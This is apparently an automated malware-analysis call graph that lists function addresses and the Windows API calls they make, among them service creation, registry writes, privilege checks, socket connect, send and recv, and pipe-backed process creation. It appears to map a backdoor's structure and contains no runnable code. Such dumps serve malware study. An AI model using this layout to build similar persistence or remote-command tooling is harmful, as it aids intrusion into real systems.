API calls 9896->9900 9898 a32f90 2 API calls 9897->9898 9899 a59c7e 9898->9899 9902 a41bb0 2 API calls 9899->9902 9901 a59d55 9900->9901 9903 a41bb0 2 API calls 9901->9903 9902->9896 9904 a59db1 9903->9904 9905 a3d530 9 API calls 9904->9905 9906 a59dd5 9905->9906 10193 a42c30 9906->10193 9908 a59e08 10196 a4a930 9908->10196 9910 a59f23 10235 a3d500 lstrlen 9910->10235 9912 a59f65 10236 a601a0 9912->10236 9916 a59fcf 9917 a42c30 8 API calls 9916->9917 9918 a59ffe 9917->9918 9919 a601a0 9 API calls 9918->9919 9920 a5a0a3 9919->9920 9921 a61050 8 API calls 9920->9921 9922 a5a0b2 9921->9922 9923 a42c30 8 API calls 9922->9923 9924 a5a0dd 9923->9924 9925 a601a0 9 API calls 9924->9925 9926 a5a118 9925->9926 9927 a61050 8 API calls 9926->9927 9928 a5a127 9927->9928 9929 a42c30 8 API calls 9928->9929 9930 a5a16c 9929->9930 9931 a601a0 9 API calls 9930->9931 9932 a5a18b 9931->9932 9933 a61050 8 API calls 9932->9933 9934 a5a197 9933->9934 9935 a42c30 8 API calls 9934->9935 9936 a5a1e1 9935->9936 9937 a601a0 9 API calls 9936->9937 9938 a5a204 9937->9938 9939 a61050 8 API calls 9938->9939 9940 a5a213 9939->9940 9941 a42c30 8 API calls 9940->9941 9942 a5a248 9941->9942 9943 a32f90 2 API calls 9942->9943 9944 a5a280 9943->9944 9945 a601a0 9 API calls 9944->9945 9946 a5a2bf 9945->9946 9947 a61050 8 API calls 9946->9947 9948 a5a2ce 9947->9948 9949 a41bb0 2 API calls 9948->9949 9950 a5a2f5 9949->9950 9951 a42c30 8 API calls 9950->9951 9952 a5a31b 9951->9952 9953 a601a0 9 API calls 9952->9953 9954 a5a347 9953->9954 9955 a61050 8 API calls 9954->9955 9956 a5a353 9955->9956 9957 a42c30 8 API calls 9956->9957 9958 a5a391 9957->9958 9959 a601a0 9 API calls 9958->9959 9960 a5a3aa 9959->9960 9961 a61050 8 API calls 9960->9961 9962 a5a3b9 9961->9962 9963 a42c30 8 API calls 9962->9963 9964 a5a402 9963->9964 10243 a42f60 9964->10243 9968 a5a465 9969 a601a0 9 API calls 9968->9969 9970 a5a471 9969->9970 9971 a61050 8 API calls 9970->9971 9972 a5a480 9971->9972 9973 a42c30 8 API calls 9972->9973 9974 a5a4d1 9973->9974 9975 a601a0 9 API calls 9974->9975 9976 a5a502 9975->9976 9977 a61050 8 API calls 9976->9977 9978 a5a511 9977->9978 10252 a497b0 9978->10252 9980 a5a54f 10279 a4d990 9980->10279 9982 a5a575 10282 a44290 9982->10282 9984 a5a5b3 10286 a50480 9984->10286 9986 a5a63b 9986->9576 9988 a54926 9987->9988 10337 a3d500 lstrlen 9988->10337 9990 a54948 9990->9602 9992 a53110 WaitForSingleObject 9991->9992 9993 a3c562 9992->9993 9994 a32800 ExitProcess 9993->9994 9995 a3c578 9994->9995 9995->9612 9997 a4ee9d 9996->9997 9998 a3e430 lstrlen 9997->9998 9999 a4eef8 9998->9999 10000 a32f90 2 API calls 9999->10000 10001 a4ef29 9999->10001 10002 a4ef91 10000->10002 10001->9619 10003 a41bb0 2 API calls 10002->10003 10004 a4f001 10003->10004 10338 a3d000 10004->10338 10006 a4f020 10006->9619 10008 a608b0 GetSystemTimeAsFileTime 10007->10008 10010 a32703 10008->10010 10009 a327c8 10009->9613 10010->10009 10011 a608b0 GetSystemTimeAsFileTime 10010->10011 10013 a32751 10011->10013 10012 a32770 Sleep 10012->10013 10013->10009 10013->10012 10014 a608b0 GetSystemTimeAsFileTime 10013->10014 10014->10013 10016 a407be 10015->10016 10017 a4055f CreateServiceA 10015->10017 10016->9628 10018 a405be 10017->10018 10019 a406bc OpenServiceA 10018->10019 10020 a405d8 ChangeServiceConfig2A StartServiceA 10018->10020 10024 a40716 StartServiceA CloseServiceHandle 10019->10024 10025 a4075e CloseServiceHandle 10019->10025 10021 a4067e CloseServiceHandle 10020->10021 10021->10025 10024->10025 10025->10016 10028 a47ab7 10027->10028 10029 a32f90 2 API calls 10028->10029 10030 a47b71 10029->10030 10031 a41bb0 2 API calls 10030->10031 10033 a47bcb 10031->10033 10032 a47cc0 RegCloseKey 10034 a39c15 10032->10034 10033->10032 10356 a3d500 lstrlen 10033->10356 10034->9636 10036 a47c87 RegSetValueExA 10036->10032 10038 a5312e WaitForSingleObject 10037->10038 10040 a39d15 10038->10040 10040->9650 10043 a40de7 10041->10043 10042 a40f4e CreateFileA 10044 a40f80 10042->10044 10043->10042 10044->9666 10046 a41254 10045->10046 10047 a4126b 10045->10047 10049 a40920 8 API calls 10046->10049 10048 a32f90 2 API calls 10047->10048 10050 a412b3 10048->10050 10049->10047 10051 a40dc0 CreateFileA 10050->10051 10052 a412cd 10051->10052 10053 a41bb0 2 API calls 10052->10053 10054 a4131f 10053->10054 10055 a41378 Sleep 10054->10055 10065 a41420 10054->10065 10056 a32f90 2 API calls 10055->10056 10058 a413b7 10056->10058 10057 a3a090 10057->9671 10059 a40dc0 CreateFileA 10058->10059 10061 a413cc 10059->10061 10064 a41bb0 2 API calls 10061->10064 10062 a4147c 10362 a65370 CloseHandle 10062->10362 10064->10065 10065->10057 10357 a410e0 10065->10357 10067 a6587d wvsprintfA 10066->10067 10068 a6586d 10066->10068 10067->9676 10068->10067 10069->9685 10071 a3e2f2 GetProcessHeap RtlAllocateHeap 10070->10071 10072 a3e2e4 10070->10072 10071->9695 10072->10071 10074 a3b84e 10073->10074 10075 a3b86a CheckTokenMembership 10074->10075 10076 a3b887 10074->10076 10075->10076 10077 a3fbc0 10076->10077 10078 a3fc3c 10077->10078 10079 a32f90 2 API calls 10078->10079 10080 a3fc76 GetProcAddress 10079->10080 10081 a41bb0 2 API calls 10080->10081 10082 a3fcb4 10081->10082 10083 a3fcc5 GetCurrentProcess 10082->10083 10084 a3fcdc 10082->10084 10083->10084 10084->9725 10085 a3f0d0 GetWindowsDirectoryA 10084->10085 10086 a3f122 10085->10086 10087 a32f90 2 API calls 10086->10087 10092 a3f1d3 10086->10092 10088 a3f170 10087->10088 10089 a41bb0 2 API calls 10088->10089 10090 a3f1bb 10089->10090 10114 a3d500 lstrlen 10090->10114 10092->9719 10094 a3d54a 10093->10094 10115 a3fa50 10094->10115 10098 a41d9d 10097->10098 10099 a53110 WaitForSingleObject 10098->10099 10100 a41e0c 10099->10100 10101 a41e23 10100->10101 10102 a41e4c CreateFileA 10100->10102 10103 a5fcc0 ReleaseMutex 10101->10103 10104 a41e93 10102->10104 10108 a41ed1 10102->10108 10106 a41e39 10103->10106 10105 a5fcc0 ReleaseMutex 10104->10105 10107 a41eaf 10105->10107 10106->9726 10107->9726 10109 a41fe8 WriteFile 10108->10109 10109->10108 10110 a42069 FindCloseChangeNotification 10109->10110 10148 a5fcc0 10110->10148 10113->9785 10114->10092 10116 a3fa7e 10115->10116 10121 a3d500 lstrlen 10116->10121 10118 a3fae4 10122 a42df0 10118->10122 10120 a3d55f 10120->9717 10121->10118 10125 a4bff0 10122->10125 10124 a42e3e 10124->10120 10126 a4c006 10125->10126 10127 a4c00d 10126->10127 10130 a53f00 10126->10130 10127->10124 10129 a4c04f 10129->10124 10132 a53f30 10130->10132 10131 a53f46 10131->10129 10132->10131 10134 a40110 10132->10134 10135 a40128 10134->10135 10136 a4038a 10135->10136 10137 a40266 10135->10137 10140 a40367 10135->10140 10143 a468d0 10136->10143 10139 a3e2c0 2 API calls 10137->10139 10141 a40276 10139->10141 10140->10131 10142 a42eb0 2 API calls 10141->10142 10142->10140 10144 a46901 10143->10144 10145 a46966 GetProcessHeap HeapAlloc 10144->10145 10146 a46926 GetProcessHeap RtlReAllocateHeap 10144->10146 10145->10140 10146->10140 10149 a5fce5 ReleaseMutex 10148->10149 10150 a5fcdb 10148->10150 10151 a420a1 10149->10151 10150->10149 10151->9726 10152->9810 10153->9860 10155 a3caa0 10154->10155 10156 a3cae7 CreateFileA 10155->10156 10157 a3cb3d ReadFile 10156->10157 10160 a3cf5d 10156->10160 10158 a3cb79 10157->10158 10159 a3cbbc CloseHandle 10157->10159 10158->10159 10183 a42a20 10159->10183 10160->9867 10162 a3cbf5 GetTickCount 10185 a61520 10162->10185 10164 a3cc2a 10189 a3d500 lstrlen 10164->10189 10166 a3cc81 10167 a32f90 2 API calls 10166->10167 10168 a3ccd1 10167->10168 10169 a41bb0 2 API calls 10168->10169 10170 a3cd00 10169->10170 10171 a3cddc CreateFileA 10170->10171 10173 a32f90 2 API calls 10170->10173 10171->10160 10174 a3cef5 WriteFile 10171->10174 10175 a3cd54 10173->10175 10176 a3cf32 10174->10176 10177 a3cf46 CloseHandle 10174->10177 10190 a3d500 lstrlen 10175->10190 10176->10177 10177->10160 10179 a3cd6c 10180 a65820 wvsprintfA 10179->10180 10181 a3cd77 10180->10181 10182 a41bb0 2 API calls 10181->10182 10182->10171 10184 a42a3b 10183->10184 10184->10162 10186 a61546 10185->10186 10191 a3d500 lstrlen 10186->10191 10188 a615bf 10188->10164 10189->10166 10190->10179 10191->10188 10192->9874 10194 a44290 8 API calls 10193->10194 10195 a42c4d 10194->10195 10195->9908 10197 a4a998 10196->10197 10198 a32f90 2 API calls 10197->10198 10199 a4aa6c 10198->10199 10200 a41bb0 2 API calls 10199->10200 10201 a4aab7 GetProcessHeap 10200->10201 10202 a4ab54 10201->10202 10203 a4aaeb 10201->10203 10204 a32f90 2 API calls 10202->10204 10203->9910 10205 a4ab6a LoadLibraryA 10204->10205 10206 a4abb1 10205->10206 10207 a41bb0 2 API calls 10206->10207 10209 a4abcb 10207->10209 10208 a4abf6 10208->9910 10209->10208 10210 a32f90 2 API calls 10209->10210 10211 a4ac99 GetProcAddress 10210->10211 10212 a41bb0 2 API calls 10211->10212 10213 a4acd9 10212->10213 10214 a4acf0 FreeLibrary 10213->10214 10215 a4ad28 HeapAlloc 10213->10215 10214->9910 10216 a4ad78 10215->10216 10217 a4ada4 FreeLibrary 10216->10217 10218 a4adfa 10216->10218 10217->9910 10220 a4ae30 HeapFree 10218->10220 10225 a4af24 10218->10225 10221 a4ae77 10220->10221 10222 a4ae8a HeapAlloc 10220->10222 10221->10222 10223 a4aeaa FreeLibrary 10222->10223 10222->10225 10224 a4aedf 10223->10224 10224->9910 10227 a32f90 2 API calls 10225->10227 10234 a4b22b 10225->10234 10226 a4b6ad HeapFree FreeLibrary 10226->9910 10228 a4affe 10227->10228 10229 a41bb0 2 API calls 10228->10229 10230 a4b074 10229->10230 10231 a32f90 2 API calls 10230->10231 10230->10234 10232 a4b249 10231->10232 10233 a41bb0 2 API calls 10232->10233 10233->10234 10234->10226 10235->9912 10291 a4a810 10236->10291 10239 a61050 10240 a61071 10239->10240 10241 a44290 8 API calls 10240->10241 10242 a6107f 10241->10242 10242->9916 10244 a42f95 10243->10244 10245 a32f90 2 API calls 10244->10245 10246 a42fd0 10245->10246 10247 a41bb0 2 API calls 10246->10247 10248 a43030 10247->10248 10249 a46600 10248->10249 10298 a3d500 lstrlen 10249->10298 10251 a46655 10251->9968 10253 a497e8 10252->10253 10254 a32f90 2 API calls 10253->10254 10255 a4987a 10254->10255 10256 a32f90 2 API calls 10255->10256 10257 a498a9 10256->10257 10258 a32f90 2 API calls 10257->10258 10259 a498d7 10258->10259 10260 a41bb0 2 API calls 10259->10260 10261 a49917 10260->10261 10262 a32f90 2 API calls 10261->10262 10263 a49955 10262->10263 10264 a41bb0 2 API calls 10263->10264 10265 a499ab 10264->10265 10266 a41bb0 2 API calls 10265->10266 10270 a49a2b 10266->10270 10267 a4a5a1 10268 a41bb0 2 API calls 10267->10268 10272 a4a606 10268->10272 10271 a31ca0 9 API calls 10270->10271 10278 a49f98 10270->10278 10299 a46810 10270->10299 10271->10270 10272->9980 10273 a46810 8 API calls 10273->10278 10274 a4a428 10274->10267 10275 a46810 8 API calls 10274->10275 10302 a31ca0 10274->10302 10275->10274 10277 a31ca0 9 API calls 10277->10278 10278->10267 10278->10273 10278->10274 10278->10277 10280 a4bff0 8 API calls 10279->10280 10281 a4d997 10280->10281 10281->9982 10283 a442e3 10282->10283 10284 a4bff0 8 API calls 10283->10284 10285 a4432f 10284->10285 10285->9984 10313 a54450 10286->10313 10288 a504ab 10289 a44290 8 API calls 10288->10289 10290 a50589 10288->10290 10289->10290 10290->9986 10292 a4a81c 10291->10292 10297 a3d500 lstrlen 10292->10297 10294 a4a8a0 10295 a42df0 8 API calls 10294->10295 10296 a4a8ac 10295->10296 10296->10239 10297->10294 10298->10251 10308 a41c30 10299->10308 10301 a4681e 10301->10270 10303 a3d5d0 10302->10303 10312 a3d500 lstrlen 10303->10312 10305 a3d630 10306 a44290 8 API calls 10305->10306 10307 a3d63c 10306->10307 10307->10274 10309 a41c67 10308->10309 10310 a4bff0 8 API calls 10309->10310 10311 a41c89 10310->10311 10311->10301 10312->10305 10318 a600f0 10313->10318 10315 a54475 10315->10288 10317 a5457d 10315->10317 10322 a40920 10315->10322 10317->10288 10319 a60149 10318->10319 10320 a6010b 10318->10320 10319->10315 10321 a4d990 8 API calls 10320->10321 10321->10319 10323 a40945 10322->10323 10324 a53110 WaitForSingleObject 10323->10324 10325 a40a18 10324->10325 10326 a32f90 2 API calls 10325->10326 10336 a40b2c 10325->10336 10327 a40a68 GetProcAddress 10326->10327 10328 a40aa7 10327->10328 10329 a32f90 2 API calls 10328->10329 10330 a40ad3 10329->10330 10332 a41bb0 2 API calls 10330->10332 10331 a5fcc0 ReleaseMutex 10333 a40d8e 10331->10333 10334 a40ae7 GetProcAddress 10332->10334 10333->10315 10335 a41bb0 2 API calls 10334->10335 10335->10336 10336->10331 10337->9990 10339 a3d00d 10338->10339 10340 a4d990 8 API calls 10339->10340 10341 a3d0dd 10340->10341 10342 a53110 WaitForSingleObject 10341->10342 10343 a3d0f2 CreateFileA 10342->10343 10344 a3d131 10343->10344 10350 a3d140 10343->10350 10345 a5fcc0 ReleaseMutex 10344->10345 10347 a3d410 10345->10347 10346 a3d1b9 ReadFile 10346->10350 10347->10006 10348 a40110 8 API calls 10348->10350 10349 a3d3e3 CloseHandle 10349->10344 10350->10346 10350->10348 10350->10349 10351 a44290 8 API calls 10350->10351 10352 a3d294 CloseHandle 10350->10352 10351->10350 10354 a5fcc0 ReleaseMutex 10352->10354 10355 a3d322 10354->10355 10355->10006 10356->10036 10358 a41115 10357->10358 10359 a41126 10357->10359 10358->10062 10360 a41137 10359->10360 10361 a4114e WriteFile 10359->10361 10360->10062 10361->10062 10363 a653d4 10362->10363 10363->10057 10658 a3e211 10659 a3e240 ExitProcess 10658->10659 10661 a46c10 10663 a46c21 RegisterServiceCtrlHandlerA 10661->10663 10664 a46da2 SetServiceStatus CreateEventA 10663->10664 10665 a46fc8 10663->10665 10666 a46e58 SetServiceStatus 10664->10666 10667 a46e3b 10664->10667 10668 a46ea0 WaitForSingleObject 10666->10668 10667->10666 10668->10668 10669 a46ecb 10668->10669 10670 a53110 WaitForSingleObject 10669->10670 10671 a46eff SetServiceStatus CloseHandle SetServiceStatus 10670->10671 10671->10665 11240 a54590 11241 a545bd 11240->11241 11242 a50610 2 API calls 11241->11242 11243 a545c2 11242->11243 11244 a5fde0 3 API calls 11243->11244 11245 a545ee 11244->11245 11246 a54672 ExitProcess 11245->11246 11247 a55f98 11248 a55706 11247->11248 11249 a586f1 11248->11249 11251 a3d500 lstrlen 11248->11251 11251->11248 10543 a544e5 10544 a544f0 10543->10544 10545 a40920 8 API calls 10544->10545 10546 a5457d 10544->10546 10545->10544 10551 a566e7 10552 a5679c 10551->10552 10556 a55706 10552->10556 10558 a3d500 lstrlen 10552->10558 10554 a586f1 10556->10554 10557 a3d500 lstrlen 10556->10557 10557->10556 10558->10556 10672 a41860 10673 a4187d 10672->10673 10674 a4189b SetServiceStatus 10673->10674 10676 a418c1 10673->10676 10677 a418cb SetServiceStatus SetEvent 10673->10677 10676->10677 11259 a555e0 11260 a55643 11259->11260 11263 a55679 11259->11263 11261 a556c7 11263->11261 11264 a3d500 lstrlen 11263->11264 11264->11263 11449 a32764 11450 a32770 Sleep 11449->11450 11452 a3279b 11450->11452 11451 a608b0 GetSystemTimeAsFileTime 11451->11452 11452->11450 11452->11451 11453 a327c8 11452->11453 10678 a43874 10687 a43880 10678->10687 10679 a53a80 4 API calls 10679->10687 10680 a44009 10681 a4403e 10680->10681 10682 a4404a 10680->10682 10684 a31170 2 API calls 10681->10684 10685 a31170 2 API calls 10682->10685 10683 a31170 2 API calls 10689 a43959 10683->10689 10688 a44045 10684->10688 10685->10688 10686 a42c90 4 API calls 10686->10687 10687->10679 10687->10686 10687->10689 10689->10680 10689->10683 11265 a46ff0 11266 a4700d 11265->11266 11275 a3d500 lstrlen 11266->11275 11268 a47083 11269 a40110 8 API calls 11268->11269 11270 a47099 11269->11270 11271 a31ca0 9 API calls 11270->11271 11272 a470ac 11271->11272 11273 a53080 8 API calls 11272->11273 11274 a470d0 11273->11274 11275->11268 10694 a56a7b 10695 a56a8c 10694->10695 10696 a57846 10695->10696 10697 a577c2 10695->10697 10711 a55706 10695->10711 10699 a57852 10696->10699 10700 a5793b 10696->10700 10698 a65820 wvsprintfA 10697->10698 10698->10711 10702 a578c5 10699->10702 10704 a5786e 10699->10704 10701 a579a8 10700->10701 10703 a57957 10700->10703 10705 a65820 wvsprintfA 10701->10705 10706 a65820 wvsprintfA 10702->10706 10707 a65820 wvsprintfA 10703->10707 10703->10711 10708 a65820 wvsprintfA 10704->10708 10704->10711 10705->10711 10706->10711 10707->10711 10708->10711 10709 a586f1 10711->10709 10712 a3d500 lstrlen 10711->10712 10712->10711 11284 a3a5c0 11285 a4d990 8 API calls 11284->11285 11286 a3a600 11285->11286 11291 a32b40 11286->11291 11288 a3a61d 11289 a4d990 8 API calls 11288->11289 11290 a3a6ac 11289->11290 11292 a32b51 11291->11292 11293 a54420 8 API calls 11292->11293 11294 a32b61 11293->11294 11294->11288 10563 a4a6c0 10564 a4a6d7 10563->10564 10565 a54450 12 API calls 10564->10565 10566 a4a71c 10565->10566 10567 a44290 8 API calls 10566->10567 10568 a4a7ea 10567->10568 10717 a4ca40 10718 a4ca62 10717->10718 10773 a549b0 10718->10773 10720 a4cb32 10721 a54af0 4 API calls 10720->10721 10725 a4d03e 10720->10725 10722 a4cc06 10721->10722 10723 a32f90 2 API calls 10722->10723 10724 a4cc2c 10723->10724 10726 a3d530 9 API calls 10724->10726 10727 a4cc44 10726->10727 10728 a41bb0 2 API calls 10727->10728 10729 a4cc6b 10728->10729 10777 a32f00 10729->10777 10734 a61050 8 API calls 10735 a4cccb 10734->10735 10736 a32f90 2 API calls 10735->10736 10737 a4ccf4 10736->10737 10738 a601a0 9 API calls 10737->10738 10739 a4cd19 10738->10739 10740 a61050 8 API calls 10739->10740 10741 a4cd25 10740->10741 10742 a41bb0 2 API calls 10741->10742 10743 a4cd47 10742->10743 10744 a4c770 8 API calls 10743->10744 10745 a4cd7b 10744->10745 10746 a61050 8 API calls 10745->10746 10747 a4cd84 10746->10747 10748 a5b500 8 API calls 10747->10748 10749 a4cdb4 10748->10749 10783 a3e550 10749->10783 10751 a4cde5 10752 a497b0 9 API calls 10751->10752 10753 a4ce25 10752->10753 10841 a4bf40 10753->10841 10756 a32f90 2 API calls 10757 a4ce9c 10756->10757 10758 a601a0 9 API calls 10757->10758 10759 a4cec2 10758->10759 10760 a61050 8 API calls 10759->10760 10761 a4cece 10760->10761 10762 a41bb0 2 API calls 10761->10762 10763 a4cf08 10762->10763 10764 a44290 8 API calls 10763->10764 10765 a4cf34 10764->10765 10766 a4d990 8 API calls 10765->10766 10767 a4cfb2 10766->10767 10768 a32f90 2 API calls 10767->10768 10769 a4cfd0 10768->10769 10845 a50d80 10769->10845 10771 a4d029 10772 a41bb0 2 API calls 10771->10772 10772->10725 10774 a44290 8 API calls 10773->10774 10775 a549e4 SetEvent 10774->10775 10775->10720 10948 a408d0 10777->10948 10780 a54df0 10781 a3e100 8 API calls 10780->10781 10782 a4ccbf 10781->10782 10782->10734 10784 a3e5ad 10783->10784 10785 a32f90 2 API calls 10784->10785 10790 a3e6cb 10784->10790 10786 a3e689 10785->10786 10787 a3d530 9 API calls 10786->10787 10788 a3e6a0 10787->10788 10789 a41bb0 2 API calls 10788->10789 10789->10790 10791 a3e7e1 10790->10791 10792 a3e77f 10790->10792 10796 a32f90 2 API calls 10791->10796 10793 a32f90 2 API calls 10792->10793 10794 a3e795 10793->10794 10795 a3d530 9 API calls 10794->10795 10797 a3e7ac 10795->10797 10798 a3e819 10796->10798 10799 a41bb0 2 API calls 10797->10799 10956 a5f500 10798->10956 10800 a3e7c5 10799->10800 10800->10751 10803 a41bb0 2 API calls 10804 a3e893 10803->10804 10805 a3e9a8 10804->10805 10806 a3e8bf 10804->10806 10968 a4d820 10805->10968 10809 a32f90 2 API calls 10806->10809 10812 a3e924 10809->10812 10810 a3e9d6 10813 a32f90 2 API calls 10810->10813 10811 a3ea7f 10814 a548d0 lstrlen 10811->10814 10816 a3d530 9 API calls 10812->10816 10815 a3e9fb 10813->10815 10817 a3eac3 10814->10817 10818 a3d530 9 API calls 10815->10818 10819 a3e96c 10816->10819 10972 a3ff90 10817->10972 10822 a3ea36 10818->10822 10820 a41bb0 2 API calls 10819->10820 10823 a3e994 10820->10823 10825 a41bb0 2 API calls 10822->10825 10823->10751 10826 a3ea49 10825->10826 10826->10751 10829 a32f90 2 API calls 10830 a3eb9a 10829->10830 10831 a41bb0 2 API calls 10830->10831 10832 a3ebe8 10831->10832 10980 a3d500 lstrlen 10832->10980 10834 a3ec14 10835 a41d90 5 API calls 10834->10835 10836 a3ec47 10835->10836 10981 a48200 10836->10981 10840 a3ed7c 10840->10751 10842 a4bf63 10841->10842 10843 a54420 8 API calls 10842->10843 10844 a4bf73 10843->10844 10844->10756 10847 a50d9a 10845->10847 10846 a608b0 GetSystemTimeAsFileTime 10848 a50f04 10846->10848 10847->10846 11172 a3d500 lstrlen 10848->11172 10850 a50f89 10850->10771 10852 a5110c 11174 a3d500 lstrlen 10852->11174 10854 a50f6d 10854->10850 11173 a3d500 lstrlen 10854->11173 10855 a52250 10855->10771 10856 a5111a 10856->10855 10857 a32f90 2 API calls 10856->10857 10858 a51195 10857->10858 10859 a3d530 9 API calls 10858->10859 10860 a511c3 10859->10860 10861 a41bb0 2 API calls 10860->10861 10862 a511d5 10861->10862 10864 a32f90 2 API calls 10862->10864 10891 a5134c 10862->10891 10863 a601a0 9 API calls 10865 a513d8 10863->10865 10866 a51226 10864->10866 10867 a61050 8 API calls 10865->10867 10869 a4a810 9 API calls 10866->10869 10868 a513e4 10867->10868 10870 a32f90 2 API calls 10868->10870 10871 a51258 10869->10871 10872 a51422 10870->10872 10874 a41bb0 2 API calls 10871->10874 10873 a601a0 9 API calls 10872->10873 10875 a5144a 10873->10875 10878 a51288 10874->10878 10876 a61050 8 API calls 10875->10876 10877 a51456 10876->10877 10879 a41bb0 2 API calls 10877->10879 10880 a5b500 8 API calls 10878->10880 10878->10891 10881 a51478 10879->10881 10882 a512fa 10880->10882 10885 a601a0 9 API calls 10881->10885 10883 a32f90 2 API calls 10882->10883 10884 a51310 10883->10884 10886 a3d530 9 API calls 10884->10886 10887 a514e2 10885->10887 10888 a51328 10886->10888 10889 a61050 8 API calls 10887->10889 10890 a41bb0 2 API calls 10888->10890 10892 a514f1 10889->10892 10890->10891 10891->10863 10895 a32f90 2 API calls 10892->10895 10931 a516c2 10892->10931 10893 a32f90 2 API calls 10894 a51702 10893->10894 10896 a601a0 9 API calls 10894->10896 10897 a51595 10895->10897 10898 a51728 10896->10898 10900 a601a0 9 API calls 10897->10900 10899 a61050 8 API calls 10898->10899 10901 a51734 10899->10901 10902 a515d0 10900->10902 10905 a41bb0 2 API calls 10901->10905 10903 a61050 8 API calls 10902->10903 10904 a515df 10903->10904 10908 a32f90 2 API calls 10904->10908 10906 a5174e 10905->10906 10907 a51786 socket 10906->10907 10909 a61050 8 API calls 10906->10909 10910 a517b2 10907->10910 10911 a517de 10907->10911 10912 a51600 10908->10912 10909->10907 10910->10771 10913 a518c4 gethostbyname 10911->10913 10914 a517fb setsockopt 10911->10914 10915 a41bb0 2 API calls 10912->10915 10913->10855 10916 a518ed inet_ntoa inet_addr htons connect 10913->10916 10917 a51866 10914->10917 10918 a51628 10915->10918 10920 a519ca 10916->10920 10924 a519e0 10916->10924 10917->10913 10921 a65820 wvsprintfA 10918->10921 10920->10771 10922 a5165e 10921->10922 10923 a41bb0 2 API calls 10922->10923 10925 a5167a 10923->10925 10926 a51a00 send 10924->10926 10927 a601a0 9 API calls 10925->10927 10930 a51a1e 10926->10930 10928 a516b3 10927->10928 10929 a61050 8 API calls 10928->10929 10929->10931 10932 a4d990 8 API calls 10930->10932 10934 a51a3e 10930->10934 10931->10893 10933 a51add recv 10932->10933 10935 a521ad closesocket 10933->10935 10941 a51b57 10933->10941 10934->10771 10937 a52210 10935->10937 10937->10855 10938 a5b500 8 API calls 10937->10938 10938->10855 10939 a40110 8 API calls 10939->10941 10940 a44290 8 API calls 10940->10941 10941->10935 10941->10939 10941->10940 10942 a52135 recv 10941->10942 10943 a52187 10941->10943 10945 a32f90 GetProcessHeap RtlAllocateHeap 10941->10945 10946 a4a810 9 API calls 10941->10946 10947 a41bb0 GetProcessHeap RtlFreeHeap 10941->10947 11175 a31df0 10941->11175 11179 a3c110 10941->11179 10942->10941 10942->10943 10943->10935 10945->10941 10946->10941 10947->10941 10949 a408db 10948->10949 10952 a47ed0 10949->10952 10953 a47eec 10952->10953 10954 a54420 8 API calls 10953->10954 10955 a32f17 10954->10955 10955->10780 10958 a5f5be 10956->10958 10957 a3e83f 10957->10803 10958->10957 11005 a321f0 10958->11005 10962 a5f77d 10963 a5f6bd 10962->10963 11015 a4dcf0 10962->11015 11035 a32f20 10963->11035 10966 a5f882 11023 a60220 10966->11023 10969 a4d83c GetModuleFileNameA 10968->10969 10971 a3e9cb 10969->10971 10971->10810 10971->10811 10973 a3ffcb 10972->10973 10974 a40920 8 API calls 10973->10974 10975 a3eaeb 10973->10975 10974->10975 10976 a47ff0 10975->10976 10979 a48035 10976->10979 10977 a3eb0c 10977->10829 10978 a3ff90 8 API calls 10978->10979 10979->10977 10979->10978 10980->10834 10982 a4823e 10981->10982 10983 a48465 CreatePipe 10982->10983 10984 a48499 SetHandleInformation CreatePipe 10983->10984 10985 a4848a 10983->10985 10988 a485cd SetHandleInformation 10984->10988 10989 a4858a 10984->10989 10987 a4d990 8 API calls 10985->10987 10990 a3ed18 DeleteFileA 10985->10990 10987->10990 10993 a4860f 10988->10993 10991 a487e3 CloseHandle 10989->10991 10990->10840 10991->10985 10992 a487fd CloseHandle 10991->10992 10992->10985 10994 a48719 CreateProcessA 10993->10994 10995 a48777 10994->10995 10996 a4885c WriteFile 10995->10996 10997 a48789 CloseHandle CloseHandle 10995->10997 10996->10997 10998 a488dd CloseHandle CloseHandle 10996->10998 10997->10991 11000 a4893e 10998->11000 11164 a323a0 11000->11164 11003 a489e6 CloseHandle CloseHandle 11004 a489b2 11004->11003 11006 a3221e 11005->11006 11007 a53a80 4 API calls 11006->11007 11008 a322ae 11007->11008 11009 a58b60 4 API calls 11008->11009 11010 a322d1 11008->11010 11009->11010 11010->10963 11011 a58b60 11010->11011 11012 a58b95 11011->11012 11013 a53a80 4 API calls 11012->11013 11014 a58be0 11013->11014 11014->10962 11016 a4dd26 11015->11016 11038 a3bfa0 11016->11038 11020 a4dd68 11050 a60a90 11020->11050 11022 a4dd93 11022->10966 11024 a6022d 11023->11024 11026 a603d0 11024->11026 11062 a3c6b0 11024->11062 11026->10963 11027 a60369 11027->11026 11030 a32f90 2 API calls 11027->11030 11033 a60613 11027->11033 11028 a32f90 2 API calls 11034 a605e4 11028->11034 11029 a60713 11029->10963 11031 a605c8 11030->11031 11032 a41bb0 2 API calls 11031->11032 11031->11034 11032->11033 11033->11028 11033->11029 11034->10963 11036 a31170 2 API calls 11035->11036 11037 a32f63 11036->11037 11037->10957 11039 a3c008 11038->11039 11040 a32f90 2 API calls 11039->11040 11041 a3c048 11040->11041 11042 a41bb0 2 API calls 11041->11042 11043 a3c072 11042->11043 11044 a44db0 11043->11044 11045 a450de 11044->11045 11046 a44dfc 11044->11046 11045->11020 11047 a44f9c 11046->11047 11056 a54ea0 11046->11056 11047->11045 11049 a54ea0 4 API calls 11047->11049 11049->11047 11051 a60ab6 11050->11051 11052 a44db0 4 API calls 11051->11052 11053 a60dd8 11052->11053 11054 a44db0 4 API calls 11053->11054 11055 a60e55 11054->11055 11055->11022 11057 a54f16 11056->11057 11058 a32f90 2 API calls 11057->11058 11059 a55042 11058->11059 11060 a41bb0 2 API calls 11059->11060 11061 a553e8 11060->11061 11061->11047 11063 a3c6f6 11062->11063 11064 a321f0 4 API calls 11063->11064 11066 a3c722 11064->11066 11065 a31170 2 API calls 11067 a3c8d2 11065->11067 11068 a3c74d 11066->11068 11071 a3c79a 11066->11071 11073 a3c813 11066->11073 11067->11027 11069 a31170 2 API calls 11068->11069 11070 a3c772 11069->11070 11070->11027 11074 a430f0 11071->11074 11073->11065 11076 a4313f 11074->11076 11075 a440b3 11075->11073 11076->11075 11077 a53a80 4 API calls 11076->11077 11078 a4338d 11077->11078 11082 a53a80 4 API calls 11078->11082 11106 a43959 11078->11106 11079 a44009 11080 a4403e 11079->11080 11081 a4404a 11079->11081 11084 a31170 2 API calls 11080->11084 11085 a31170 2 API calls 11081->11085 11086 a433ef 11082->11086 11083 a31170 2 API calls 11083->11106 11089 a44045 11084->11089 11085->11089 11087 a53a80 4 API calls 11086->11087 11086->11106 11088 a4343c 11087->11088 11090 a58b60 4 API calls 11088->11090 11100 a43469 11088->11100 